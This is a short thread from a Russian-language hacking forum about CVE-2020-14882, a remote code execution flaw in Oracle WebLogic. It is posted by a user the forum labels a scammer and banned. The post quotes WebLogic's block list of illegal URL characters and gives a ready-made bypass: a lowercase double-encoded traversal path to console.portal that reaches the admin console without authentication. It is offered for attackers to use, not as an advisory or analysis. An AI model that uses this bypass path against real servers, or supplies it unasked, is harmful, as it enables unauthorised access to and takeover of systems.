• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote RCE, WebLogic, CVE-2020-14882

r1z

Still(In)Secure
КИДАЛА
Регистрация
19.07.2019
Сообщения
938
Реакции
822
Гарант сделки
30
Пожалуйста, обратите внимание, что пользователь заблокирован
CVE-2020–14882 - research by Jang

screenPoc.png





more info:

 
Пожалуйста, обратите внимание, что пользователь заблокирован
update: additional bypass for the same vulnerability;


private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"}; >>> "%252E%252E%252F".lower() '%252e%252e%252f' /console/css/%252e%252e%252fconsole.portal

ElacXJdVkAAaAPL.jpeg
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх